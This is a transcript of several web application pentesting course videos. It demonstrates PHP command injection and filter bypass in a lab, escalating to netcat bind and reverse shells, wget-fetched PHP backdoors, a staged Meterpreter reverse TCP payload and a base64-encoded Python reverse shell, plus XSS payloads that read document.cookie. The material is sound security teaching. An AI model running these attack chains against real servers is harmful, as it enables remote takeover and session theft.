ahead and show you an example. Now there is a file basically called commandinjection.zip, which is available for download from below the video. Please download that and copy it inside your Kali machine. Once you're in, let's go to the var www directory, and I'm going to copy that commandinjection.zip file in here, and I'm going to unzip it. Now I'm going to change to the directory command injection. You would see 3 files in there. I'm going to use one of them in this video and the remaining 2 in the next video. So let's open up list.php. And to illustrate command injection, this is a very simple program. What does it do? It basically takes an argument called path from the request and then uses the ls command with it and goes ahead and calls that command to figure out the listing of that directory or path. Now, as you can clearly see that the user input is concatenated with the ls-alh string as is without any check or sanitizations. Let's see what issues this can cause. Now we also need to start the Apache server. It's a simple PHP file, so the good news is there's no major configuration required. You might want to check the IP address of your Kali machine. In my case, it is 1.13. So let me type that in, 192.168.1.13 slash command injection slash list.php. Right? So by default, as you can clearly see, it lists the current directory, and we can pass an argument to it called list, called path. I can path the root directory and we see what is in there. We can go into /temp directory and all of that, right? So of course, you already have a small vulnerability in here with which we can traverse path and list files and stuff like that. But maybe this was required behavior, right? If you look at it, overall, this does not look too bad. Now, here is the problem, right? If you go to a command shell, and let's say you want to run two commands, let's say ls-alh/var/w, and then you want to add another command, you can use colon to signify end of first command and then put in the next one, which is, let's say, ping-c for google.com, right? And that command as well. And if you notice, we got the output of our ls as well as the ping command ran together. Now what if, right, we go ahead and try the same thing in this script. So I'm going to go in here, terminate with a colon, type in ping-c for google.com. Let's terminate that as well. If you notice, it takes a little bit more time right now. There is no instantaneous result. But at the very end of it, we can clearly see that both commands have executed. Now, this is what is called command injection. Now, you can do ahead and do tons of interesting stuff in here. For example, if netcat was available, you can invoke netcat as a listener, and when something connects to it, you can actually have bin bash spawned so that we actually get a remote shell. So you can do that with a netcat -l-p, let's say port number 4444, -e, the program to invoke, -bin/bash, and this, and you would notice that this continues to run. And here is what one could do, is that we could now go ahead and invoke netcat and connect to 1.13 on port 4444. If you notice, we are connected, and now we can pretty much run commands from in here, right? So we have a remote shell. Now, as you can imagine, we can download files, execute stuff, tons of things are possible, right? So, right, and exit, of course, eventually. And when we exit, of course, the script exits as well, right? So this is really how a command injection can eventually lead to even an interactive shell on the box, just like what we saw right now with netcat. So please download this script and try out this example. In the next video, we will look at what happens when different filters are used to inhibit things like command injection. If you're enjoying your time at Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will go further into command injection and see what can be done using different kinds of filters. So in the previous example, what we had seen is that we were able to append multiple commands using colon. Of course, we could just replace or ban many of these characters. So let's say, if you notice, we were using colon. And right now we go ahead and replace it with a space so that this can't work. And by the way, this command injection.zip contains all these files which I had given you in the previous video. And let me go back to the demos right here. So now here is what I'm going to do. I'm going to change this to list-filter.php. Works perfectly. Now when I go ahead and append colon and let's say do a ping -c 3 google.com, you'd see that nothing happens, right? Even if I run something as simple as pwd, nothing really happens, right? So we have to look at other bypass techniques. And this is where the shell has a rich set of characters which one can use and try. One of which is the pipe character, which is used for going ahead and chaining commands. So let's go ahead and use pipe, and then let me say pwd. And if you notice, the command after the pipe pwd has now run successfully, and we get the output. Similarly, we could go back and actually do our little netcat trick, cat -l -p 4444 -e bin bash. We notice it waits, which is a good sign. Go back to our terminal, connect. Awesome. So now we have a shell on the box, right? So as you can clearly imagine, probably not a good idea for the programmer to try and do this on a trial error basis, simply because if you try to do it yourself, you would be limited to your understanding of what characters can be used to escape back into the shell and run arbitrary commands. Now, to help with this, PHP basically has a set of APIs. Two of the more popular ones are escape shell arg and escape shell command. And as you can clearly see, escape shell command even tells you the list of characters it escapes and proceeds with a backlash, right? Now, the thing is this good enough? And this is really where there have been issues which were discovered off and on with escape shell arg and escape shell command, in which it came to light that it was still possible, by going ahead and of course finding bugs in the implementation, to escape back to the shell. So you have been warned, and honestly there are even examples today where in certain conditions you could abuse the argument field and do stuff. Having said that, let me actually show you a demo of how it looks like once we use PHP's functions. And this is implemented in list-filter2.php. So here is what I've done. I actually use escape shell arg to go ahead and sanitize the path input which was sent to me. So let me now try that. You can go in here, put in filter 2, and if you notice, nothing happens, right? Pretty much nothing happens. We are unable to execute. Of course, the original script would work as is. You can try our little colon trick as well, but nothing happens, right? And this is really where the function does an absolutely fantastic job in at least removing most of these characters which are worrisome to us. So hopefully this should have given you an idea about command injection, why it's a bad idea to write your own filters, and beyond a point, honestly, why also not to depend on filters which even ship with the PHP installation. Honestly, shell commands as much as possible using user input should pretty much be avoided, right? Simply because, it's almost like waiting to be exploited. Either the programmer makes a mistake in the logic in some way, or as you've seen, it is even possible that vulnerabilities are discovered in the native APIs themselves. So hopefully this section has been fun and educational. I would highly recommend you use the 3 PHP scripts and try out all these examples yourself. That's all I have in mind for this video. If you're enjoying your time at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Web Application Pen Testing course at Pentester Academy. Now in this video, we would look at how to exploit a web vulnerability and to get a shell on the server. Now, what are web shells? The whole idea is really to upload a backdoor on the server with which we can continue to execute commands without having to worry if the original vulnerability ends up getting patched or not. Now, there are various ways by which we can get from a web vulnerability to a shell on the box and to go ahead and install a web shell. These include command injection, which we've already seen and discussed, file upload, which we will look at, and even in some cases SQL injection and all can lead to getting a shell on the box. We will discuss specific scenarios when we are looking at those vulnerabilities. Now the setup which I have in mind is for the vulnerable server is an Ubuntu system, a server version running 12.04 LTS, and I leave the installation to you. The only thing which you need to remember is when you go to software selection during the installation process, remember to check the OpenSSH server and LAMP server. This ensures that PHP, Apache and all of that gets installed by default, and we are good to go for this demo. Okay, so here is what I've done. The vulnerable Ubuntu server is at the IP address 1.5. Let me actually log on to that machine. So it's already set up. You would probably need to create this Ubuntu server yourself. And inside the var www directory, I have copied list.php, which I had distributed with the command injection videos, which I think was probably 1 or 2 videos before. So please download list.php from those videos and put it in the var www directory. Now, one of the other things I'm going to do is in this specific video, we will assume that var www is writable by the web process. Now, what this really means is when Apache runs and we hit a script, the script will be able to store or create new files in the var www directory. Now, don't worry, this is the first simpler case. We will take up cases when this directory is not writable and other difficult cases as well in the next couple of videos. All I really want to do right now is to ensure that we end up covering all possibilities. Great. So what I'm going to do is I'm going to do the easiest way to fix this: chmod 777 var www, and as it's an Ubuntu, need to remember to do my sudos. So now the web directory or the web root is writable, right? Next video we'll take it up where it won't be writable, so don't worry. Now on 1.5 I already have list.php running, and if you recall, this takes in a path, and this is vulnerable to command injection. As we've discussed before, you can actually see it's vulnerable to command injection. Now, how do we get a shell on the box? In many ways, command injection is already shell on the box, but we would want to go ahead and upload a much more powerful shell which can allow us to do a lot of things. Now, what do we do? Okay, so on Kali, if you go to user share and then go to a directory called web shells, you would actually find web shells characterized by the language. Now, what is a web shell? It's a specialized program which you can use as a backdoor to execute commands and to do other interesting things on a compromised server. So let's look at PHP web shells. There are a bunch of them. The one we will use for this demo will be php-backdoor.php. So let me do the following. Let's figure out our IP address. It's 1.13, and let me run our Python server. Server is running. Now the first thing, as you would imagine you would want to do, is somehow manage to download this file onto the vulnerable web server, right? This can be done very, very easily by using the wget command. Now wget is pretty much installed in most Linux and Unix based systems. So let's type in the URL. Now the attacker's IP is 192.168.1.13, and the port on which our Python based server is listening is port 8000, as we can see here. So I'm going to say port 8000, and then the file is going to be php-backdoor.php. Let's just verify this is the right file name, php-backdoor.php. Fantastic. Go back in here, let's finish our command, and there we go. Right. Now to quickly verify, we can just go ahead and change the path variable to current and actually see what's in there. And if you notice, we actually have our php-backdoor.php created. It's owned by www-data. Now this was only possible simply because the web root was writable. And of course, as I said, in the next video, we will take up the case when it isn't writable. Awesome. Now all we have to do is basically change the path and go ahead and run php-backdoor.php, and there we go. Our web shell is all downloaded and ready to go. Now you can execute commands. Because we used a command injection vulnerability and not a file upload or something else, this is a no-brainer. We could have done it anyway. One of the interesting things I like is this basically makes it very easy to navigate. So you can actually do this, and here's a nice little listing which I can go ahead and click and try various things out, right? So of course it just depends whether you have the right permissions or not. So right now we are basically running as www-data, and this does not allow us to look into the root directory, which means we would probably look into privilege escalation attacks and things like that based on what we may find. So the best part here is now we have our own little PHP backdoor, which can go ahead and allow us to do a ton of things. So for example, it allows us even to look into files, so we can click list.php. Though it looks like there isn't anything in here, if you actually go do a view page source, you would find that you're actually able to now download the whole PHP file itself. Now imagine the repercussion, if there are config and ini files in here which contain database usernames and passwords and all of that as well. Now php-backdoor.php actually has its own little, section here which allows you to work with MySQL, etc. once you have figured out the username and password, maybe by reading one of the config or ini files. And then you can do interesting stuff in here, right? Fantastic. So hope this example was clear on how to go from a web vulnerability to a web shell on the same box. We've taken the case where the web directory was writable. In the next video, we will actually take up a case in which the web directory is not writable, and we will see what we can do. Hopefully you're enjoying your time here at Pentester Academy, and if you do, we would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you very much, guys, and see you in the next video. Bye-bye. Hello all. Welcome to the Web Application Pentesting course at Pentester Academy. In this video, we will continue with web shells and talk about PHP Meterpreter. Now, wouldn't it be great that rather than just a shell, we can actually get Meterpreter on the box? So the Metasploit guys actually came up with a PHP version of Meterpreter. Now one can only imagine that people who love Metasploit and are familiar with the post-exploitation interface would just love this. Now in this video, we will look at how to upload the PHP Meterpreter and get a Meterpreter session on the box with one very important constraint, that the web root directory, or frankly the web directory, is not writable, right? And which would be the case now for many installations. So let's go ahead and begin. So the first step is of course to generate the PHP Meterpreter. So let's go ahead, look at the details for the payload. So PHP Meterpreter reverse TCP, and let's look at the different options available to us. Okay, so as with all reverse TCP, L host needs to be defined. Now, apart from this, the output file format in this case would end up becoming raw, and then we would pipe it into a PHP file. So here we go. L host would be the attacker machine's IP address, which in this case is 1.13. The format would be raw, and let's put this into a file called php-meter.php. There we go. Now let's open the file up. And what you would notice is that we basically have a hash at the front, right? This is a guard bit. So this is the guard bit which we need to remember to remove. So let's remove it. There we go. Now let's go ahead and run our Python based web server. By the way, you could even set the port to port 80 or any other port. The default one is 8000. I leave it as an exercise to you. Now let's try and get this onto the box, or the vulnerable web application server. Now here is my vulnerable web application server, and I'm in the var www directory, and I can see I have index.html and list.php, the same file we've been using since the command injection videos. So let's try our usual path is equals root. Works perfectly. And now let me actually try my little wget thing, which I've done before. So 192.168.1.13, port number is 8000, and the file name is php-meter.php, if I remember correctly. Let me verify that again. Yes, that's what it looks like. Finish, and let's see what happens. Now let's do an ls in the same directory. But if you notice, the wget did not work. right? We do not see php-meter.php in this directory. And that is simply because www-data, var/www is not writable, right? And this is a constraint you will see time and again. But here is the good news. Even though this directory itself is not writable, there are directories such as /temp which are writable. And what we are going to do is we will use wget and store php-meter.php in the temp directory. So we see that the file was received, but unfortunately we couldn't write it. Okay, let's do another try. And this time around, let me just do a dot wget. Now wget has an -O option which can allow you to tell it where to store the file finally. So I'm going to use temp slash php-meter.php and then put the file URL 192.168.1.13 8000 php-meter.php. Finish it off. So let's look at this. Here's our first semicolon, wget-o temp php-meter.php. Give the URL to the file and hopefully this would work. So let's just go ahead and see what is there in /temp right now. And there we have, right? We see a new file php-meter.php created by the user www-data, which is really the web user, in that temp directory. So now we need to execute this file so that it can give us meterpreter on this box. Now, of course, as you can imagine, it is a reverse TCP based connection which requires us to set up a handler. So let's do that. I'm in Metasploit. I'm going to do a use exploit multi-handler. Set the payload to PHP meterpreter reverse TCP. Set lhost to 192.168.1.13 and basically hit an exploit so that we can wait for our shell to connect back. Now let's go back in here. Now PHP allows you to probably invoke it from the command line as well. So we can just say PHP and give the file to run, which would be -f/temp/php-meter.php : so this should hopefully do the magic. So if you see, this seems to be waiting, and if we go back, there you go, we have a meterpreter session on the box. You can do a sysinfo and we can clearly see it's an Ubuntu based Linux machine. We can do a get UID. We are www-data pwd, do an ls, and as you can clearly see, we now have meterpreter functionality, right? However, keep in mind that of course this is just the beginning. From here, depending on what your objective for the pen test is, you could uncover database passwords and try and connect to the database, download data and whatnot, right? You could even try privilege escalation attacks based on what kind of options are available. Maybe this is running an older kernel version which is susceptible, or some other binary which you can use to your advantage, right? So really the sky is the limit. Now, this was an interesting example in which even though the var www directory was not writable, we were still able to leverage the temp directory, of course, which will always have to be writable because it's supposed to be a temporary storage for programs and the system, to actually write a file and then execute that file to get us Meterpreter on the box, or honestly any web shell, depending on how you could weave that functionality in together with the output of the script you're exploiting. Fantastic. Now, what we will try and explore after this would be, if you do not have any options to even write, is there any interesting things you can do? Hopefully you've been enjoying all these videos at Pentester Academy, and if you have, we would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you very much and have a great day ahead. Bye-bye. Hello all. Welcome to the Web Application Pentesting course on Pentester Academy. Now in this video, we will start the very interesting and detailed topic of cross-site scripting, or XSS as it is popularly called. Now XSS is really a client-side vulnerability, and in the web world typically it's the browser which we mean by the client. Now the whole idea behind XSS is that an attacker can insert JavaScript into the web page being rendered on the client, either in a persistent or in a non-persistent way. When this happens, he can now execute that JavaScript in the context of the current user on the website in which he found the XSS vulnerability, and this could lead to a ton of interesting repercussions, the most important of which is session hijacking. Now let's take up an example. Now I'm going to use challenge 16, which was really HTML injection. And just to remind you guys, you could basically put in your email address and a password. And well, if it is wrong, it just reflects back the email address to you, just to ensure you need to just try the password again. Now, if you've done this challenge, you know that this is vulnerable to HTML injection. And if you haven't, please go visit the challenge. And if you recall, this is really what we had done. And we had put in the h1 tag, probably printed a little message in there. Let's say hello, and commented the rest out. And this had resulted in HTML injection. Now cross-site scripting is a special case in which we basically go ahead and use the JavaScript tags and insert JavaScript. So I'm going to now use the script tag rather than the h1 tag, and I'm going to put in the infamous alert box, which actually announces vulnerable to XSS. And now when we send this data back, it reflects back, and this time, rather than the browser just rendering like it did for the h1 tag, this time the browser reads that it's a script tag, takes the JavaScript in there and executes it. And as we can clearly see, we now have the alert box. Now, if this specific application had cookies in it, then we could have just put in document.cookie, and if there was a cookie, we would see that as well. Now XSS is fairly a very vast topic, and I mean to take up it in very detail. There are tons of things like how you steal the cookie, how you post it to the remote attacker's server for reuse, or how do you just take actions on behalf of the user without really even wanting to hijack the session remotely, right? So we will look at all of these variations, and this video serves as just a quick introduction to XSS. Now I've tried out the example in Firefox. If you're using Chrome, remember that Chrome has XSS protection built in. And you can click on the JavaScript console, and now if I try the same URL with the XSS vulnerability, you would actually find that there is no pop-up, but rather Chrome says something interesting, which is XSS auditor refused to execute a strip blah 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 because the auditor was enabled and the server neither sent an XSS protection or content security policy in the header. We will take both of these up in a future video in detail. But for the time being, keep in mind that many basic XSS vulnerabilities might not work in Chrome because of the XSS auditor. However, as you will see in forthcoming challenges, that in many cases you can beat the XSS auditor very simply. Anyway, that's all for this video. Hope you're enjoying your time at Pentester Academy, and if you do, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Web Application Pen Testing course at Pentester Academy. Now in this video, we will look at the different types of XSS. So broadly, XSS can be divided into persistent, non-persistent, and DOM-based. In this video, we will primarily look at the persistent and the non-persistent one, and we'll reserve a very detailed discussion on DOM-based XSS for a later video. So what is persistent, or as it is popularly called, type 1 XSS? Well, this is the case in which the actual XSS attack payload gets stored on the server side and is rendered every time you visit the vulnerable page. Now, depending on if the vulnerable page is viewable to all users of the site or to just a section of users, you may have either everyone or just that specific section of users getting affected. So let me give you an example. Now, there are many vulnerable web applications out there. One of my favorite is Damn Vulnerable Web App, or DVWA, which you can download from this URL. It should be really easy to set up. I've already done that. And ensure before you start that the security level is set to low, and you can go to XSS stored. So one of the most common examples of stored XSS is when you probably leave like a comment in a blog or sign a guest book or anything which goes ahead and stores user input and then displays it back again in a persistent way, probably using a database at the back end. So here is one example. We type this in, we say Vivek, and message, we say hello all, right? Which is my favorite message, as all of you know. And then I add the script tag and put document.cookie inside it. Close my script tag. And if you notice, I've run out of space. So I'm going to compress this a bit. There you go. And now let me sign the guest book. You can clearly see as soon as I've signed it, I get an alert saying this is the cookie PHP session ID followed by security equals low. Now if we were to look at this page, what you would find is that our script tag is now embedded in it. Now in persistent, the thing is that even if you go back to this page, say we refresh the page, you would actually find that the attack seems to be there, right? Looks like we resend the post data. That's the reason why we now have a new one. And right, so this is how persistent XSS works. Now let's look at non-persistent or type 2. In many cases, this is what people tend to call reflected XSS. So if you go back in here, this is exactly the case which we had taken in the previous video. So if you remember, could basically close the tag in there, put vulnerable to XSS, click on sign in, and you would get the alert box. Now, unfortunately, the very next time you go to this page, you would pretty much not get the XSS alert. Now, simply because the parameters which you're sending are not getting stored on the server side, rather, every single time we would have to have the client send it to the server to have the reflection happen, right? So this is a case in which you'd probably send this link in an email or probably through some social media channel and expect that the user would end up clicking it so that you have control over the specific cookie, and you can do session hijacking and a bunch of other things really. So this is really persistent and non-persistent XSS. I hope you've clearly understood the difference right now. And what we're going to do is, as far as DOM-based XSS is concerned, we'll take it up in much detail in later videos. That's all for this video. Thank you. Hello all. Welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will look at DOM-based XSS. Now DOM XSS or type 0 XSS occurs due to modification of the DOM based on user supplied input. Now the OWASP page has ton of examples and other things on it which I'd recommend that you visit. Rather than showing you theory slides, let's jump right in to a practical example and understand DOM XSS. So this is a very simple application which actually acts as a calculator. So if you notice, the statement to evaluate is actually 99 plus 100 minus 50, which gives us 149. Now we could go ahead and put in other calculations as well. 50 into 100, and that as expected is 5000. Fantastic. Or we can add further complications to it. Minus 2 into 99, and this beautifully computes it for us, right? All looks well, a simple calculator application. However, if we look at the source code, what we will actually find is this part in here where we pick up the statement by splitting the document URL and taking out the part we'd like to compute, and then we put the result inside the result div, and the way we are calculating is using eval. Now if you look up the documentation for eval, it pretty much interprets this string as a JavaScript statement and ends up evaluating it. So what this really means is, apart from the little mathematic we've been doing, we can pretty much put in any JavaScript statement in here and that would get evaluated. So let's go back in here and just let me go ahead and put in an alert 1, and as expected the statement gets evaluated. And we could try our usual variation, alert document cookie, and there we go, right? We go ahead and alert the document.cookie, right? So this is an example in which, if you think about it, we are going ahead and modifying the DOM at runtime in order to go ahead and get basically our execution. So this is an example of DOM XSS, and if you're enjoying your time here at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will look at XSS via event handler attributes. So to begin with, what are event handlers? Now, if you visited most modern websites, you would find interesting little effects. Like when you hover your mouse, you get a tooltip. When you click on a link, it probably asks you for a confirmation before moving you forward, and other fun stuff. Now, most of this is done using event handlers, which really rely on JavaScript. Now, some of these event handlers require user interaction. So for example, the on mouse over or the on click, while some do not require user interaction, such as on load, which pretty much triggers once the page is successfully loaded, or on error, which typically gets triggered if there is a specific error. Now, how event handlers work, in case you're interested from a JavaScript perspective, and maybe how to write them, etc., is present in this link. It's more of JavaScript than XSS, so I leave it as an exercise to you. I'm also planning for a JavaScript for Pentesters course here on Pentester Academy in the next month or so. So stay tuned in case you want to learn JavaScript or brush it up to make your XSS more potent. So how can we leverage event handlers to do a cross-site scripting attack? So I'm going to take up an old example where I talked about using filters for HTML injection and how it makes our life difficult. So let me go to the example. And if you remember, this is the secure version. So what that means is, if I go ahead and put vivek@abc.com, close the quote, open my little script tag, do an alert, let's say 1, close my script tag, and basically comment everything else. After that, you would pretty much notice, if you go back in there, that our script tag, the less than sign, the greater than sign, all of that has been encoded, and hence there is nothing much we can do at this point, right? Now this is where event handlers come in and are very, very handy. So what we can really do is, after the quote, go ahead and add an event handler as an example for on mouse over, and make it execute our JavaScript. So this is how we're going to do it. So first of all, I'm going to close the previous quote and then add an event handler on mouse over equals, so let's say alert XSS, and then close the final quote. Click sign up. And as soon as we do an on mouse over, you notice that it triggers, right? If you look at the JavaScript, if you look at the HTML source, you would actually see that we've beautifully gone ahead and added an event handler called on mouse over, which means anytime the mouse is over this specific element, execute this code. And this code just prints XSS using an alert box. So event handlers and leveraging them to go ahead and do XSS attacks is very, very common. Also, a lot of times it's much more easier to use them to evade filters like the CGI.escape, which we are using in this secure version of the HTMLi injection example. Now, if you're wondering what CGI escape and all of that is, look at the solution video for challenge 16, and where we discuss how filters can be used to mitigate HTMLi. Anyway, so hopefully this was a fun exercise. We will put up a ton of examples as far as challenges are concerned for XSS. So stay tuned, try all those challenges, and you'll see that a lot of interesting variations are available of these attacks. So that's all I had in mind for this video. If you're enjoying your time here at Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead.
Hello all, welcome to the web application pen testing course at Pentester Academy. Now in previous videos, we've seen how to upload web shells like the PHP Meterpreter. Now in this video, we will look at a Netcat based reverse connect web shell, and the scenario in which you would use this is when you do not have any write access to the directory, right? And for a second, let's also assume that /temp is not accessible. Now, it's important to note that even in such cases, we can try and get a shell entirely in memory using utilities installed on the system. So the utility we will use is netcat, which is installed on most Linux systems. Now, netcat has a very interesting option, the -e option, right? And the -e option allows you to execute a program after connect. And as you can clearly see, they are even warning you that this could be dangerous. Now, what is it that we want to do? We want to run the netcat reverse connect shell in memory on the web server and have it connect back to a netcat listener running on the attacker's machine. So the architecture for this specific lab exercise is the attacker's machine having the IP 192.168.1.10 is a Kali Linux machine, while the victim is a Metasploitable 2 machine having an IP 192.168.1.20. You can download Metasploitable 2 from the link provided in this slide. Also, what I have done is from the previous video, list.php has been uploaded to the var www directory on Metasploitable 2. As you can clearly see, I have list.php in there, which is what we will use as the staging script. However, you can pretty much go ahead and use the netcat listener-based approach for a reverse connect shell anytime you can get a command injection vulnerability, no matter how you do it, right? Okay. So the Metasploitable machine has an IP 1.40, list.php, which you can download from below the video, is already uploaded. And if you remember, this has a command injection vulnerability. Now, what we are going to do is on the attacker's machine, we are going to run netcat in a listener mode with the -l option. -p basically is going to be the local listening port. So let's put this as 10,000, and you can have netcat be a little verbose, and our listener is now set up. Now on the victim side, right, the assumption is that netcat is installed, which is true for most Linux based systems. And we're going to say netcat -e, and this is going to be, the program we will execute after the connection succeeds, bin bash, and the attacker IP to connect to would be 192.168.1.10. Port number would be the same as our listener, which would be 10,000. And enter. Now, if you notice, the page continues to load, and this is really because now netcat is running in memory with the execution of this page, and we have a reverse connect which is in. So you can type in ID, pwd, who am I if it works, do a ps. Pretty much now you have a shell on the box, right? Now the moment you hit exit, the shell would go ahead and disappear, right? Now this is an example in which we have utilized an existing utility on the system, right, in order to get a shell on the box. The best part of this specific technique is that we have not created a file on the system, which means write access is not required, right? This is a huge important point to remember, is that when write access isn't available even to temp, you might want to go ahead and see if utilities like netcat or some other tricks we will see in later videos can be used to get a shell on the box. So try this out, and hopefully you've enjoyed this video. If you have, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead. All, welcome to the Web Application Pen Testing course at Pentester Academy. Now in this video, we will continue with web shells and look at how we can leverage interpreters on the system such as Python, PHP, etc. to get a shell on the box. Now, what is the problem statement here in comparison to the previous video? Now, if you remember, in the last video on web shells, we looked at using netcat-based reverse shells. Now, on many of the latest Ubuntu server software, you will actually see that netcat is really a stripped down version of netcat, which does not support the -e option, which means your reverse connect shell will no longer work. And you can go ahead and check that out in your Ubuntu server. If you remember, this is the same Ubuntu server we created for earlier demos. And if you do a netcat -h, you would see a ton of options, but you would not see the -e option. And if you actually try the -e option, let's say, you would actually find that it would give you an error saying invalid -e option, right? Simply because this is the NC from netcat OpenBSD and optional version blah blah is available, which if you install, your problems would be solved. But as a pen tester, unfortunately, you would not be able to do that, right? Because the web server would be running as www data, which pretty much means that you would not be able to install packages. And if there is no write access, you would not even be able to upload totally compiled versions. So what do we do in such a case? Now the answer lies in the fact that almost all Linux systems now have interpreters such as Python, PHP, Perl, Bash, etc. And the idea is to see if we can use these to our advantage to get a reverse shell. Now let me illustrate what I mean. Now 1.20 is the IP address of my Ubuntu machine, which I have set up, and watch previous videos in case you haven't set it up already. It's just a plain Ubuntu server system. And this contains the list.php, which again we've used in a previous video. Now, the problem with this system, of course, is that netcat does not support the -e option. So now, how do we use, let's say, a Python interpreter on the system to get a reverse shell? So let me go through the process. Now, apart from creating a Python script, you can also invoke a Python command directly. So let's say if you want to print hello world, we could go ahead and invoke Python and really pass it the command which we had, and it prints hello world. Now the best part is if we copy this out, if we copy this out, go back in here, and we can even verify where Python is. So let's say, where is Python? You clearly see it's user bin Python 2.7 blah blah blah, which means Python is definitely present on the system. Similarly, you can check for PHP, check for Perl, right? And all of these can be used. So now going back, if I were to directly paste my Python script in here, if you notice, it gets executed and the hello world gets appended at the very bottom, right? Now, what we are really going to do is go ahead now, include the entire script to create a reverse connect shell, which will connect back to us and go ahead and execute bin bash on the server, right? Now, the best article I've seen on this is written by Mark Baggett and is on the paul.com website. I'd highly recommend going to paul.com. They have tons of fantastic articles on all of these little tips and tricks for pen testing. So highly recommended. Now, pretty much what he's done here is that he's gone ahead and written the whole Python script, right? The reverse shell, and then used pipes to go ahead and basically run the system commands using Python, right? As you can see, so we've imported socket, we've imported subprocess, we create the socket, we connect. Now this IP address and port number would have to be changed by us depending on what we use. And after that, he basically has a subprocess.popen in which he goes ahead and gives the command and feeds the output back. Now there are other such reverse shells possible as well, and if you go to pentestmonkey.net, you would find possibilities with bash, Perl, Python, right? And in this case, the one in here actually goes ahead and creates bin sh, with which it goes ahead and pipes the commands inside. Now you have PHP, Ruby, and all of that stuff, and our familiar netcat and a ton of others, right? Highly recommend reading this link as well. Both of them are present in the PDF. Now what I'm going to do is I'm going to take this article from Mark Baggett, and I'm just going to use the Python script from over here to do our task. So let me just go ahead and copy this script out. So he uses the exec call, so as to accommodate multi-lines and all of that stuff. If you're a Python programmer, you can read more about it. And all I'm doing is pretty much just copying this whole thing out and taking it out in here. Let's just paste it. Okay. Now, one of the things, of course, we'll do is change the port numbers and the IP address. So I'm going to make 9000 as 10,000 and change the IP address to be 192.168.1.10. You can look at our Python course if you're interested about more details of the script. We talk about subprocess, socket creation, and all of that in there. So I'm not going to really make this a Python tutorial. And if you're not too keen, well, you can use many of these one-line reverse connect shells from PentestMonkey. Okay, so let me start my listener. We can just use netcat for that purpose. Port 10,000, start listening, and go ahead and execute this. If you notice, it's executed. And if we go to our listener, we've already got a connection, right? Fantastic. Let's restart our listener. Let's go back in there, kill this. Now, what we would like to do is base64 encode this before sending this to the server. So for this, let me quickly go ahead and copy this whole thing out. just going to copy this, open a Python script, sorry, a Python shell, and just call this, let's say, shell equals, and then paste this whole thing in there, and then use encode, which you used in previous videos, and tell it to do a base 64 encoding, right? And now if you look at shell, you would find a base 64 encoded string. Now the way in which we can recover our previous script is by doing a decode, again with base 64 as the option, and you would find that we get back our script. Now what we really want to do is basically go ahead and use the following. So you can get out of this, and if you look in here, all we basically need is Python -c exec, and in here we will actually have our base 64 encoded string, which we can copy out, paste it in here, and then we can apply the decode to it using base 64 as the option. Just hope I've taken care of all the brackets, sorry, all the quotes and double quotes, and then we can go ahead and run this. If it was perfectly done, we get our reverse shell as before, right? Fantastic. So let's start the listener again, and now this beautiful little shell in here is waiting for us to be reused. So we could just copy this out, go back to our application, remove this part, paste it in, hit an enter, and if you notice, it basically goes into the whole connecting state. But if we look at our netcat listener, we already have a prompt on the system, right? There you go. So this is how, in case you do not have utilities like netcat, you can still exploit, let's say, a command injection and go ahead and execute a Python script on the remote system to give you back a reverse shell, right? So check out this entire article. I'd highly recommend using this article, and at the bottom, Mark has also given examples about how you can use this with MSF payload, package payloads inside, and do a ton of interesting stuff. It's definitely worth a read. And then definitely go down to Pentest Monkey and try out these other examples as well, right? The links to all of these are there in your PDF, so you can just click and have a look. And I would highly recommend, reading Paul.com's article and even subscribing to their podcast, because they have a ton of informative stuff which they put out. So hopefully you've enjoyed this video on Pentester Academy. If you have, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pen Testing course on Pentester Academy. Now, basically in the last couple of videos, we've looked at XSS, and as you can see from the challenges section, we've put out a ton of those challenges. But the question really arises, how does one go beyond just the plain alert XSS or the alert document.cookie? Now, why would you need to go beyond this? Simply because think about the use case where you may have to post a form using JavaScript, or maybe modify the DOM in an interesting way based on a specific proof of concept your pen testing customer would like you to do. Now, this is where what I've seen is, for pen testers, the knowledge of JavaScript becomes the biggest bottleneck.
Now, of course, as a pen tester, you do not need to know developer grade JavaScript, which is, I mean, after all, you do not want to program animations and things like that using JavaScript. So the idea really is that you should know enough JavaScript so that you can do a lot of the stuff which pen testers may be confronted with in the field. And this is really what I plan to do in the next couple of videos. And we are going to call it JavaScript for pen testers. So similar to our course Python for pen testers, in JavaScript for pen testers, we will first look at the basics of JavaScript and then see how we can apply it to XSS, some cases of CSRF and all of that, and do interesting things. So the next couple of videos hopefully is going to be enjoyable, simply because of the fact that JavaScript for pen testers will also eventually be spun off as a full-blown course. I'm going to separate it out, but logically it is the continuation of the web application pen testing course. That's all for this video. If you're enjoying your time here at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will look at file upload vulnerability basics. Now, what is a file upload vulnerability attack? There are many websites which offer a file upload facility. Now this could be, let's say, to upload your images, to create an album, maybe to upload an avatar, or a bunch of other possible use cases. Now an attacker manages to abuse this file upload feature and uploads a malicious script on the server. He then further manages to execute this uploaded script to allow for further access. Now in the most typical case, the uploaded script is a web shell which allows him to run arbitrary commands on the remote server. Now we've covered web shells in previous videos, so if you haven't had a look, please do so. Now basically, apart from the most simple case, filters on content type, extension names, sizes, etc. can cause issues to a pen tester while testing for file upload vulnerabilities. So in the next couple of videos, we will look into all of these different variations and how a pen tester can work against them. So in this very first video, we will take up a simple example. And to do that example, please download the zip file mentioned under this video and follow along. Now unzip this under var www. I'm using a Kali machine. You can pretty much use any machine with an Apache server on it, including Ubuntu. Now after that, once you've unzipped it, I go into the file upload basic folder. Bunch of files in here. You have file.html, upload.php, and a directory called uploads. Ensure that write access is given to the uploads directory. Now let's open up our browser and let's navigate to localhost 